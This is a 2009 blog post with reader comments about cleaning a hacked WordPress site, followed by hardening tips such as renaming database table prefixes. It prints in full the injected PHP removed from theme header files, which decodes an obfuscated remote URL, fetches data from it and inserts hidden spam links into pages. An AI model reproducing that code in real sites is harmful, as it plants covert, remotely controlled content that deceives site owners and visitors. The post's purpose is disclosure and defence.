wp_remote_fopen WordPress Attack Makes Site SLOW

Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress

Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):

 

<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k=>$v) $txt_out.=’<a href=”‘.$v.’”>’.$k.’</a>’; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”

Who knew that was the thing to do?  I didn’t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.

 

Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.

 

WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually

 

Basically you:

  1. download your database thru PHPMyAdmin as per WordPress.org’s Documentation
  2. do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_” 
  3. make a new database and import your “somethingelse_” version to the new database.
  4. Change your wp-config.php file to point at the new database 
  5. Change your wp-config.php file’s “table prefix” line from “$table_prefix  = ‘wp_’ ” to “$table_prefix  = ‘somethingelse_’

These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.

If you found this information helpful, please consider making a donation. No amount is too small.

5 Responses to “wp_remote_fopen WordPress Attack Makes Site SLOW”

 
Mike Hedge wrote on June 22nd, 2009 9:35 am :

why was all that code in the [redacted-website-name] wordpress?

andrewapeterson wrote on June 22nd, 2009 9:55 am :

I suspect it was left over from previous problems and old conditions.
The smartest thing for any WP user to do at this point is to preempt these kinds of attacks by using the tools I mentioned, mainly Akismet and WP Security Scan.

I bet within the next year, WP will start including much more protection off-the-shelf.

Mike Hedge wrote on June 22nd, 2009 10:47 am :

ok…

well thanks for finding this and solving it.

d.s. wrote on July 2nd, 2009 2:46 pm :

a site of mine was attacked in the same way, but when i swapped the wp_ for something else, i started getting this message when i attempt to access the admin panel:

You do not have sufficient permissions to access this page.

d.s. wrote on July 2nd, 2009 3:11 pm :

oh, it’s because i just renamed the tables w/o doing the find and replace on all instances of wp_ within the db itself.

Leave a Reply